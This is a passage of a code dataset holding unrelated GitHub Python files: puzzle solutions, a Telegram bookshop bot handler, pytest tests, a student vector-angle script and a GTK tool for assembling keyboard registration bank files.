ox_rating, oxygen)) if len(oxygen) > 1 else oxygen\n co2 = list(filter(lambda nb: nb[i] == co2_rating, co2)) if len(co2) > 1 else co2\n i += 1\n \nprint(int(oxygen[0], 2) * int(co2[0], 2))\n","repo_name":"Patato777/AoC-2021","sub_path":"scripts/AoC2021-03_2.py","file_name":"AoC2021-03_2.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12743884168","text":"def measure_min_distance(p1, p2):\n return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\n\ndef convert2pair(num_list, w):\n result = []\n for nums in num_list:\n temp = [(num // w, num % w) for num in nums]\n flag = True\n for i in range(len(temp)):\n if not flag:\n break\n for j in range(i + 1, len(temp)):\n m = measure_min_distance(temp[i], temp[j])\n if m <= 2:\n flag = False\n break\n if flag:\n result.append(temp)\n return result\n\n\nimport queue\n\n\ndef get_distance(square_list, h, w):\n long_distance = h * w\n matrix = [[long_distance for _ in range(w)] for _ in range(h)]\n is_visited = [[False for _ in range(w)] for _ in range(h)]\n q = queue.Queue()\n max_len = 0\n for x, y in square_list:\n matrix[x][y] = 0\n is_visited[x][y] = True\n q.put((x, y))\n\n while not q.empty():\n cx, cy = q.get()\n for i, j in zip([1, -1, 0, 0], [0, 0, 1, -1]):\n nx, ny = cx + i, cy + j\n if 0 <= ny < w and 0 <= nx < h:\n if matrix[nx][ny] > (matrix[cx][cy] + 1):\n matrix[nx][ny] = matrix[cx][cy] + 1\n max_len = max(max_len, matrix[nx][ny])\n q.put((nx, ny))\n return max_len\n\n\ndef combine(k, h, w):\n if h*w <= k:\n return 0\n\n result = []\n n = h * w\n min_distance = 99\n\n def helper(exist_list, rest, rest_k):\n if len(rest) < rest_k:\n return\n if len(exist_list) == k:\n result.append(exist_list)\n return\n i = 0\n while i < len(rest):\n next_exist_list = exist_list[:]\n next_exist_list.append(rest[i])\n helper(next_exist_list, rest[i + 1:], rest_k - 1)\n i += 1\n\n helper([], list(range(n)), k)\n result = convert2pair(result, w)\n if not result:\n return 1\n\n for points in result:\n distance = get_distance(points, h, w)\n if min_distance > distance:\n min_distance = min(min_distance, distance)\n\n print(points, min_distance)\n if min_distance == 1:\n return 1\n\n print(min_distance)\n return min_distance\n\n\n\nif __name__ == '__main__':\n print(combine(2, 1, 3))\n\n\n\n\n\n","repo_name":"hlcr/Leetcode","sub_path":"design_square.py","file_name":"design_square.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73091749264","text":"from aiogram import F, Router\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nfrom aiogram.types import Message\nfrom data_base.buy_books_bd_for_books import add_new_book\nfrom keyboards.keyboard_for_admin import keyboard_for_admin\nfrom keyboards.buy_books_keyboard import stop_fsm\nfrom config import admins_ids\n\n\nrouter = Router()\n\n''' Добавление новой книги '''\n\n\nclass FSMAdmin(StatesGroup):\n photo = State()\n name = State()\n author = State()\n description = State()\n price = State()\n\n\n@router.message(F.text == 'Stop 🛑')\nasync def process_gender_press(message: Message, state: FSMContext):\n await message.answer('Заполние прекращено', reply_markup=keyboard_for_admin)\n await state.clear()\n\n\n@router.message(F.text == 'Добавить книгу ✅')\nasync def add_book(message: Message, state: FSMContext):\n if message.from_user.id in admins_ids:\n await 
state.set_state(FSMAdmin.name)\n await message.answer(text=\"Загрузите название:\", reply_markup=stop_fsm())\n\n\n@router.message(FSMAdmin.name)\nasync def add_name(message: Message, state: FSMContext):\n await state.update_data(name=message.text)\n await state.set_state(FSMAdmin.author)\n await message.answer('Введите автора книги:')\n\n\n@router.message(FSMAdmin.author)\nasync def add_author(message: Message, state: FSMContext):\n await state.update_data(author=message.text)\n await state.set_state(FSMAdmin.description)\n await message.answer('Введите описание книги:')\n\n\n@router.message(FSMAdmin.description)\nasync def add_description(message: Message, state: FSMContext):\n if len(message.text) < 15:\n await message.answer('Описание книги ��олжно быть информативным')\n else:\n await state.update_data(description=message.text)\n await state.set_state(FSMAdmin.price)\n await message.answer('Введите цену книги:')\n\n\n@router.message(FSMAdmin.price)\nasync def add_description(message: Message, state: FSMContext):\n if message.text.isdigit():\n await state.update_data(price=message.text)\n await state.set_state(FSMAdmin.photo)\n await message.answer('Загрузите фото:')\n else:\n await message.answer('Введите цену книги:')\n\n\n@router.message(FSMAdmin.photo, F.photo)\nasync def add_photo(message: Message, state: FSMContext):\n photo = message.photo[-1].file_id\n data = await state.get_data()\n await state.clear()\n book = {}\n\n for key, value in data.items():\n book[key] = value\n await message.answer_photo(photo=photo, caption=f'Название: {book[\"name\"].capitalize()}\\n'\n f'Автор: {book[\"author\"].title()}\\n'\n f'Описание: {book[\"description\"].capitalize()}\\n'\n f'Цена: {book[\"price\"]}', reply_markup=keyboard_for_admin,\n parse_mode='html')\n add_new_book(name=book['name'],\n author=book['author'],\n description=book['description'],\n price=book['price'],\n photo=photo)\n\n\n@router.message(FSMAdmin.photo, ~F.photo)\nasync def add_photo(message: Message, state: FSMContext):\n await message.answer('Загрузите фото:')\n","repo_name":"denis313/Bot_for_buy_book","sub_path":"handlers/admin/admin_add_book.py","file_name":"admin_add_book.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30288231015","text":"import dataclasses as dc\nfrom typing import List, Any, Dict\nimport sys\nimport pytest\nimport yaml\n\nfrom app import thread_function_executions\nfrom tests.thread_function_executions_resources import app as test_resources\n\n\nTEST_RESOURCES_DIR = __file__.replace('app.py', 'test_resources')\n\n\n@dc.dataclass\nclass Tests:\n test_description: str = None\n case_descriptions: List[str] | str = None\n cases: List[Any] | Any = None\n expected_results: List[Any] | Any = None\n expectedfields: List[bool] | bool = None\n\n\ndef test_get_test_function_name() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: function doesn't take in arguments\n cases:\n - data: null\n - data: null\n - data: null\n expected_results:\n - test_get_test_function_name\n - test_get_test_function_name\n - test_get_test_function_name\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n\n # Execute function\n result = app.get_test_function_name(data=_case)\n \n # Result should be 
the name of this test function\n assert result == tests.expected_results[i]\n\n\ndef test_get_function_name_from_test_function_name() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: \n - test function name with a prefix\n - test function name with a prefix\n - test function name with a suffix\n - test function name with a suffix\n cases:\n - prefix: 'prefix_0_'\n test_function_name: prefix_0_test_function_name\n - prefix: 'prefix_1_'\n test_function_name: prefix_1_test_function_name\n - suffix: '_suffix_0'\n test_function_name: test_function_name_suffix_0\n - suffix: '_suffix_1'\n test_function_name: test_function_name_suffix_1\n expected_results:\n - test_function_name\n - test_function_name\n - test_function_name\n - test_function_name\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n\n # Execute function\n result = function(**_case)\n \n # Result should remove the suffix of prefix from the test function name\n # to get the name of the function being tested\n assert result == tests.expected_results[i]\n\n\ndef test_get_function_from_module() -> None:\n tests = '''\n test_description: Should return a function from a module\n case_descriptions: \n - add function in test_resources.app\n - subtract function in test_resources.app\n cases:\n - _module: {test_resources}\n function_name: add\n - _module: {test_resources}\n function_name: subtract\n expected_results:\n - add\n - subtract\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n _case['_module'] = test_resources\n\n # Execute function\n result = function(**_case)\n \n # Result should be a function with the correct name\n assert type(result).__name__ == 'function'\n assert result.__name__ == tests.expected_results[i]\n\n\ndef test_setup_main_data() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: \n - a empty dictionary\n - a dictionary\n - a empty dataclass\n - a dataclass\n cases:\n - {}\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n - {}\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n expected_results:\n - test_function_name: null\n _module: null\n prefix: test_\n suffix: _test\n function_name: null\n function: null\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n - test_function_name: null\n _module: null\n prefix: test_\n suffix: _test\n function_name: null\n function: null\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n '''\n # Load test cases into dataclass\n tests = 
yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n # Convert the third and fourth cases to dataclasses before processing\n if i in [2, 3]:\n _case = app.Data(**_case)\n print(_case)\n \n\n # Execute function\n result = function(data=_case)\n \n # Result should be of type `Data` and have the expected values\n assert type(result).__name__ == 'Data'\n for field, expected_value in tests.expected_results[i].items():\n result_value = getattr(result, field)\n assert result_value == expected_value\n\n\nif __name__ == '__main__':\n # Invoke pytest for this module\n pytest_arguments = sys.argv\n pytest_arguments.extend(['-x', '-s', '--vv', '--cov', '.'])\n pytest.main()","repo_name":"fjemi/mono_repo","sub_path":"tests/tests/get_module_function_test.py","file_name":"get_module_function_test.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17378019861","text":"import os\n\nblank = {}\n\nwith open('config.yaml', 'r', encoding='utf-8') as f:\n blank = dict(map(str.split, f.readlines()))\n\nproject_dir = blank.pop('base')\nos.makedirs(project_dir, exist_ok=True)\nos.chdir(project_dir)\n\nfor folder, files in blank.items():\n os.makedirs(folder, exist_ok=True)\n for file in files.split(','):\n with open(folder+'/'+file,'w') as f:\n print('файл создан')\n\nprint(blank)\n","repo_name":"Sikonay/GB_lesson","sub_path":"7_lesson/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9711076096","text":"# By submitting this assignment, I agree to the following:\r\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\r\n# \"I have not given or received any unauthorized aid on this assignment.\"\r\n#\r\n# Name: Daniel Mireles\r\n# Section: 102-540\r\n# Assignment: Lab3b_Act4_Prog2\r\n# Date: 09/12/2019\r\n\r\n#This program takes the points observed by the user and\r\n#calculates the angle, in degrees, between those two points\r\nfrom math import *\r\n#input point of observer\r\nx0 = float(input(\"Enter initial x coordinate: \"))\r\ny0 = float(input(\"Enter initial y coordinate: \"))\r\nz0 = float(input(\"Enter initial z coordinate: \"))\r\nx0 = float(x0)\r\ny0 = float(y0)\r\nz0 = float(z0)\r\n\r\n#input first point observed \r\n\r\nx1 = float(input(\"Enter first observed x value: \"))\r\ny1 = float(input(\"Enter first observed y value: \"))\r\nz1 = float(input(\"Enter first observed z value: \"))\r\nx1 = float(x1)\r\ny1 = float(y1)\r\nz1 = float(z1)\r\n\r\n# input second point observed\r\n\r\nx2 = float(input(\"Enter second observed x value: \"))\r\ny2 = float(input(\"Enter second observed y value: \"))\r\nz2 = float(input(\"Enter second observed z value: \"))\r\nx2 = float(x2)\r\ny2 = float(y2)\r\nz2 = float(z2)\r\n\r\n#assigning vectors\r\n\r\nvec1= (x1-x0,y1-y0,z1-z0)\r\nvec2= (x2-x0,y2-y0,z2-z0)\r\n\r\n#dot product of vectors \r\n\r\ntop = sum([vec1[i]*vec2[i] for i in range(3)])\r\n\r\nbottom = math.sqrt(sum([vec1[i]*vec1[i] for i in range(3)])) * math.sqrt(sum([vec2[i]*vec2[i] for i in range(3)]))\r\n\r\nangle=(math.degrees(math.acos(top/bottom)))\r\nDecimal =\"%6.2f\" % angle\r\nprint()\r\nprint(\"The angle between the points is:\",Decimal, 
\"degrees\")","repo_name":"DannyMireles/Python","sub_path":"Lab3b_Act4_Prog2.py","file_name":"Lab3b_Act4_Prog2.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31010439525","text":"__all__ = [\n \"CreateBankTab\"\n]\n\n# Import global modules\nimport os\nimport os.path\nimport glob\nimport gtk.gdk\nimport gobject\n\nimport kiwi.ui.dialogs\nfrom kiwi.ui.objectlist import ObjectList\nfrom kiwi.ui.objectlist import Column\nfrom kiwi.ui.widgets.combo import ProxyComboBox\n\n\n# Import application modules\nimport appexceptions\nimport regfile\nimport mainwindow\nimport batchdialog\nimport const\nimport main\nimport easydraganddrop\nimport regbank\nimport util\n\n# Class definition\nclass CreateBankTab(gobject.GObject):\n '''\n This delegate class coordinates the assembly of bank files.\n\n Emited signals:\n ---------------\n\n *reglist-updated*: Emited after the list of available registrations\n has changed. (Without renames)\n\n *keyboard-model-changed*: Emited after a change of the selected keyboard\n model (for a new bank) has been successfuly processed.\n\n *newlist-updated*: Emited after the export list has changed. (Without\n renames)\n '''\n\n # Object creation..........................................................\n\n def __init__(self, wndMain):\n '''\n Constructor. Takes a MainWindow instance as parameter because as\n coordinating controller class access to the UI is needed.\n '''\n # Initialize attributes\n self.main = main.Main.getInstance()\n self.wndMain = wndMain\n\n # Define signals\n gobject.GObject.__init__(self)\n\n gobject.signal_new(\n \"reglist-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"keyboard-model-changed\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"newlist-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"filter-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n # Insert ObjectLists into the main window\n self.oblAvailableRegs = ObjectList(\n [\n Column(\"name\", title=_(\"Registration Name\"), order=gtk.SORT_ASCENDING, searchable=True, editable=True, expand=True),\n Column(\"keyName\", title=_(\"Keyboard\"), order=gtk.SORT_ASCENDING),\n ],\n sortable = True\n )\n\n self.oblNewBank = ObjectList(\n [\n Column(\"name\", title=_(\"Registration Name\"), order=-1, searchable=True, editable=True, expand=True),\n ]\n )\n\n self.wndMain.evtAvailableRegs.add(self.oblAvailableRegs)\n self.wndMain.evtNewBank.add(self.oblNewBank)\n\n self.oblAvailableRegs.show()\n self.oblNewBank.show()\n\n try:\n self.oblAvailableRegs.enable_dnd()\n self.oblNewBank.enable_dnd()\n except AttributeError:\n # Work around mising DnD-support in older kiwi versions\n pass\n\n # NOTE: Don't set the TreeView reorderable except you're in for some\n # nasty exceptions if someone really tries to reorder the tree.\n ## self.oblNewBank.get_treeview().set_reorderable(True)\n\n self.oblAvailableRegs.connect(\"cell-edited\", self.on_oblAvailableRegs_cell_edited)\n self.oblNewBank.connect(\"cell-edited\", self.on_oblNewBank_cell_edited)\n self.oblNewBank.connect(\"has-rows\", self.onNewBankEmptyChanged)\n\n # Insert combobox for selecting display filter of registrations\n self.cbxNewBankAvailFilter = ProxyComboBox()\n 
self.wndMain.evtNewBankAvailFilter.add(self.cbxNewBankAvailFilter)\n self.cbxNewBankAvailFilter.show()\n\n # Insert combobox for selecting keyboard model of new bank files\n self.cbxNewBankKeyModel = ProxyComboBox()\n self.wndMain.evtNewBankKeyModel.add(self.cbxNewBankKeyModel)\n self.cbxNewBankKeyModel.show()\n\n # Connect to drag and drop signals\n # NOTE: Source is always the encapsulated TreeView but destination\n # is the ObjectList which holds the TreeView!\n self.dndAvailableRegs = easydraganddrop.EasyDragAndDrop(\n srcWidget = self.oblNewBank.get_treeview(),\n dstWidget = self.oblAvailableRegs,\n checkFunc = lambda row: True,\n actionFunc = lambda src, dst, row: self.removeColumn(\n src = src,\n dst = dst,\n row = row\n ),\n dataFunc = lambda: self.getDataNewBank()\n )\n\n self.dndNewBank = easydraganddrop.EasyDragAndDrop(\n srcWidget = self.oblAvailableRegs.get_treeview(),\n dstWidget = self.oblNewBank,\n checkFunc = lambda row: self.checkCopyRegToNewBank(row),\n actionFunc = lambda src, dst, row: self.copyColumn(\n src = src,\n dst = dst,\n row = row\n ),\n dataFunc = lambda: self.getDataAvailableRegs()\n )\n\n # Initialize and kickstart filter\n self.allRegs = []\n self.prevFilter = const.FILTER_UNDEFINED\n\n self.connect(\"reglist-updated\", self.filterToAvailableList)\n self.connect(\"keyboard-model-changed\", self.filterToAvailableList)\n self.cbxNewBankAvailFilter.connect(\"content-changed\", self.filterToAvailableList)\n\n # Connect to main.work_dir_changed signal\n self.main.connect(\"work-dir-changed\", self.on_main__work_dir_changed)\n\n # Pre-fill filter combobx\n self.cbxNewBankAvailFilter.clear()\n self.cbxNewBankAvailFilter.append_item(_(\"Show All\"), const.FILTER_NONE)\n self.cbxNewBankAvailFilter.append_item(_(\"Compatible Only\"), const.FILTER_COMPATIBLE)\n self.cbxNewBankAvailFilter.append_item(_(\"Selected Model\"), const.FILTER_MODEL)\n\n self.cbxNewBankAvailFilter.select(const.FILTER_NONE)\n self.cbxNewBankAvailFilter.update(const.FILTER_NONE)\n\n # Pre-fill keyboard model combobox\n self.cbxNewBankKeyModel.clear()\n self.cbxNewBankKeyModel.append_item(const.keyboardNameLong[const.UNKNOWN_MODEL], const.UNKNOWN_MODEL)\n\n try:\n models = []\n classes = regbank.bankfile.BankFile.getAllSubclasses()\n\n for cls in classes:\n for model in cls.keyboardNames:\n if not model in models:\n models.append(model)\n\n models.sort()\n\n for model in models:\n if model == const.ALL_MODELS \\\n or model == const.UNKNOWN_MODEL:\n continue\n\n label = const.keyboardNameLong[model]\n self.cbxNewBankKeyModel.append_item(label, model)\n except appexceptions.NoClassFound:\n pass\n\n self.cbxNewBankKeyModel.select(const.UNKNOWN_MODEL)\n self.cbxNewBankKeyModel.update(const.UNKNOWN_MODEL)\n\n self.allowedKeyboardNames = []\n\n # Connect to content-changed of keyboard model combobox\n # NOTE: This must be done after the widget has been filled with data\n # for the first time. 
Otherwise the event would be triggered with\n # each new entry and raise a TypeError exception for the first entry.\n self.cbxNewBankKeyModel.connect(\"content-changed\", self.onKeyboardModelChanged)\n\n # Add images to buttons\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_GO_FORWARD, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnAddSelected.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnAddSelected.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_GO_BACK, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnRemoveSelected.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnRemoveSelected.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_EXECUTE, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnBatch.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnBatch.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_CLEAR, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnClearList.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnClearList.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_SAVE_AS, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnSaveBank.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnSaveBank.set_image(img)\n\n # Events for checking allowed buttons\n self.connect(\"reglist-updated\", self.checkAllowedButtons)\n self.connect(\"newlist-updated\", self.checkAllowedButtons)\n self.connect(\"filter-updated\", self.checkAllowedButtons)\n self.connect(\"keyboard-model-changed\", self.checkAllowedButtons)\n self.cbxNewBankKeyModel.connect(\"content-changed\", self.checkAllowedButtons)\n\n\n # Work directory access ...................................................\n\n def on_main__work_dir_changed(self, obj, workDir):\n '''\n Event handler for changed working directory. Updates the list of\n available registrations.\n '''\n # Remove all items from list\n self.allRegs = []\n\n # Retrieve list of available files\n pattern = os.path.join(workDir, \"*.%s\" % (regfile.extension))\n filenames = glob.glob(pattern)\n\n # Append empty registration entry to list\n entry = mainwindow.AvailableRegsEntry(\n name = const.REG_NAME_EMPTY,\n keyName = const.keyboardNameLong[const.ALL_MODELS],\n model = const.ALL_MODELS,\n fileName = \"\"\n )\n\n self.allRegs.append(entry)\n\n # Read files and append to list\n for filename in filenames:\n # Skip bad files\n if not regfile.regfile.RegFile.canUnderstandFile(filename=filename):\n continue\n\n # Read registration data and populate list\n regFile = regfile.regfile.RegFile(filename=filename)\n\n entry = mainwindow.AvailableRegsEntry(\n name = regFile.getRegistrationObject().getName(),\n keyName = const.keyboardNameLong[regFile.getKeyboardName()],\n model = regFile.getKeyboardName(),\n fileName = filename\n )\n\n self.allRegs.append(entry)\n\n # Make sure that values get filtered to display\n self.prevFilter = const.FILTER_UNDEFINED\n\n # Emit reglist-updated signal\n self.emit(\"reglist-updated\")\n\n\n def availableRegRename(self, regEntry):\n '''\n Delegate method called by UI. 
Responds to a renamed available\n registration by changing the registration file's content and name.\n '''\n # Don't process dummy registrtions (### EMPTY ###)\n if not regEntry.fileName:\n regEntry.name = const.REG_NAME_EMPTY\n return\n\n # Access registration binary data\n regFile = regfile.regfile.RegFile(filename=regEntry.fileName)\n regObj = regFile.getRegistrationObject()\n\n # Abort if name didn't change\n if regEntry.name == regObj.getName():\n return\n\n # Store changed name into binary data\n oldName = regObj.getName()\n regObj.setName(regEntry.name)\n\n # Save registration file with new file name (but keep old file)\n oldFileName = regEntry.fileName\n newFileName = util.calculateFileNameFromRegName(regEntry.name, self.main.workDir)\n regFile.storeRegFile(newFileName)\n\n # Change entry of available registration list in-place (no list reload)\n regEntry.fileName = newFileName\n\n # Scan list of new bank file and replace old filename if found\n for newReg in self.oblNewBank:\n # Skip dummy registrations\n if not newReg.fileName:\n continue\n\n # Skip files whose file name doesn't match anyway\n if not os.path.samefile(newReg.fileName, oldFileName):\n continue\n\n # Change file name\n newReg.fileName = newFileName\n\n # Change name if it matches old name\n if newReg.name == oldName:\n newReg.name = regEntry.name\n\n # Update displayed list\n self.oblNewBank.update(newReg)\n\n # Delete old file with old name\n if not os.path.samefile(oldFileName, newFileName):\n os.unlink(oldFileName)\n\n # Emit reglist-updated signal\n self.emit(\"reglist-updated\")\n\n\n # List of available registrations .........................................\n\n def doBatch(self):\n '''\n Delegate method called by the UI. Gets called when the user activates\n the \"Batch\" button. Uses a BatchDialog object in order to show a\n modal dialog which performs the processing.\n '''\n # Make sure a valid keyboard model was selected\n keyboardName = self.getNewBankKeyboardName()\n\n if keyboardName == const.ALL_MODELS \\\n or keyboardName == const.UNKNOWN_MODEL:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return\n\n # Collect registrations for the dialog\n regEntryList = []\n\n for entry in self.oblAvailableRegs:\n if not entry.fileName:\n continue\n\n if not entry.model in self.allowedKeyboardNames:\n continue\n\n regEntryList.append(entry)\n\n batchDialog = batchdialog.BatchDialog(keyboardName, regEntryList)\n\n try:\n amountFiles = batchDialog.show()\n\n # Display status message\n self.wndMain.setStatusMessage(const.msg[\"n-banks-created\"] % (amountFiles))\n except appexceptions.Cancel:\n pass\n\n batchDialog.destroy()\n\n\n def filterToAvailableList(self, *data):\n '''\n Event handler method which fills the available registrations ObjectList\n by piping all registrations through the filter method\n »filterSingleEntry«.\n\n This handler responds to »reglist-updated« and »keyboard-model-changed«\n events of the own class. 
But it also connects to the filter criterion's\n combobox so that it gets called whenever the user selects a different\n criterion.\n '''\n # Update only if filter mode changed\n currentFilter = self.cbxNewBankAvailFilter.get_selected()\n\n if currentFilter == self.prevFilter:\n return\n\n # Pipe entries through filter to ObjectList\n self.oblAvailableRegs.clear()\n\n for regEntry in self.allRegs:\n try:\n # Test for filter and add to display list\n self.filterSingleEntry(regEntry, currentFilter)\n self.oblAvailableRegs.append(regEntry)\n except appexceptions.DoesNotMatchFilter:\n # Filtered out entry\n pass\n\n # Remember filter criterion\n self.prevFilter = currentFilter\n\n # Tell the world\n self.emit(\"filter-updated\")\n\n\n def filterSingleEntry(self, regEntry, filter):\n '''\n Filter test method which tests the given RegEntry object against the\n given filter. Return nothing on success, throws an exception of type\n appexceptions.DoesNotMatchFilter on negative result.\n '''\n # Check for universal models\n if regEntry.model == const.ALL_MODELS:\n return\n\n # Check filter criteria\n if filter == const.FILTER_NONE:\n return\n\n elif filter == const.FILTER_MODEL:\n if regEntry.model == self.getNewBankKeyboardName():\n return\n else:\n raise appexceptions.DoesNotMatchFilter(regEntry, filter)\n\n elif filter == const.FILTER_COMPATIBLE:\n if regEntry.model in self.allowedKeyboardNames:\n return\n else:\n raise appexceptions.DoesNotMatchFilter(regEntry, filter)\n\n\n # Export list of new bank file ............................................\n\n def onNewBankEmptyChanged(self, list, hasRows):\n '''\n Delegate methode called by the UI. Gets called whenever the list of\n a new bank becomes empty or non-empty. This is cruical for activating\n and deactivating the keyboard model combobox.\n '''\n # Disable keyboard selection when export list is not empty\n self.cbxNewBankKeyModel.set_sensitive(not hasRows)\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def newBankRegRename(self, regEntry):\n '''\n Delegate method called by UI. Responds to a renamed registration by\n checking for an empty registration. Changes to empty registrations\n will be undone other changes stay in-tact.\n '''\n # Don't allow editing of dummy registrations (### EMPTY ###)\n if not regEntry.fileName:\n regEntry.name = const.REG_NAME_EMPTY\n return\n\n\n def addSelectedItemsToExport(self):\n '''\n Delegate method called by the UI. Copies the selected items from the\n available list to the export list.\n '''\n # Get selected row\n row = self.oblAvailableRegs.get_selected()\n\n if not row:\n return\n\n\n # Check whether copying is allowed (just like DnD would do)\n if not self.checkCopyRegToNewBank(row):\n return\n\n # Copy row to export list\n self.copyColumn(self.oblAvailableRegs, self.oblNewBank, row)\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def removeSelectedItemsFromExportList(self):\n '''\n Delegate method called by the UI. Removes all selected items from the\n export list.\n '''\n #for entry in self.oblNewBank.get_selected_rows():\n # self.oblNewBank.remove(entry)\n self.removeColumn(None, None, self.oblNewBank.get_selected())\n\n # Emit newlist-changed signal\n self.emit(\"newlist-updated\")\n\n\n def removeAllItemsFromExportList(self):\n '''\n Delegate method called by the UI. 
Removes all items from the export\n list.\n '''\n self.oblNewBank.clear()\n self.wndMain.setStatusMessage(const.msg[\"clear-ok\"])\n\n\n def newBankMoveSelectedUp(self):\n '''\n Delegate method called by the UI. Moves the selected registration\n of a new bank file down by one position.\n '''\n # Move selected entry up\n pos = self.oblNewBank.get_selected_row_number()\n\n if not pos or pos < 1:\n return\n\n row = self.oblNewBank.get_selected()\n self.oblNewBank.remove(row)\n\n self.oblNewBank.insert(\n index = pos - 1,\n instance = row,\n select = True\n )\n\n # Give short success message\n self.wndMain.setStatusMessage(const.msg[\"moved-one-up\"] % (row.name))\n\n\n def newBankMoveSelectedDown(self):\n '''\n Delegate method called by the UI. Moves the selected registration\n of a new bank file up by one position.\n '''\n # Move selected entry down\n pos = self.oblNewBank.get_selected_row_number()\n\n if pos < 0 or pos >= len(self.oblNewBank) - 1:\n return\n\n row = self.oblNewBank.get_selected()\n self.oblNewBank.remove(row)\n\n self.oblNewBank.insert(\n index = pos + 1,\n instance = row,\n select = True\n )\n\n # Give short success message\n self.wndMain.setStatusMessage(const.msg[\"moved-one-down\"] % (row.name))\n\n\n def saveBankFile(self):\n '''\n Delegate method called by the UI. Asks the user for a filename and\n stores all registrations from the export list in it.\n '''\n # Check for valid keyboard model\n if self.getNewBankKeyboardName() == const.UNKNOWN_MODEL \\\n or self.getNewBankKeyboardName() == const.ALL_MODELS:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return\n\n model = self.getNewBankKeyboardName()\n bankClass = regbank.bankfile.BankFile.getClassForKeyboardName(model)\n\n # Ask user for file name\n fileName = kiwi.ui.dialogs.save(\n title = _(\"Save Registration Bank\"),\n parent = self.wndMain.wndMain,\n current_name = \"*.%s\" % (bankClass.fileExt)\n )\n\n if not fileName:\n return\n\n # Change processe's working directory so that file dialogs remember it\n self.main.chdirFromFilename(\n filename = fileName\n )\n\n # Read binary registration data from disk\n # And assemble list of Registration objects.\n # While at it also apply name changes.\n regList = []\n\n for regEntry in self.oblNewBank:\n regFile = regfile.regfile.RegFile(filename=regEntry.fileName)\n regObj = regFile.getRegistrationObject()\n\n if regObj:\n regObj.setName(regEntry.name)\n\n regList.append(regObj)\n\n # Append empty registrations as necessary\n missing = bankClass.maxReg - len(regList)\n\n if missing > 0:\n for i in range(missing):\n regList.append(None)\n\n # Create new bank file object\n bankFile = bankClass(keyboardName=model)\n bankFile.setRegistrationObjects(regList)\n\n # Store file to disk\n bankFile.storeBankFile(fileName)\n\n # Show success message\n self.wndMain.setStatusMessage(const.msg[\"bank-save-ok\"] % (fileName))\n\n\n def getNewBankKeyboardName(self):\n '''\n Determines the technical keyboard name 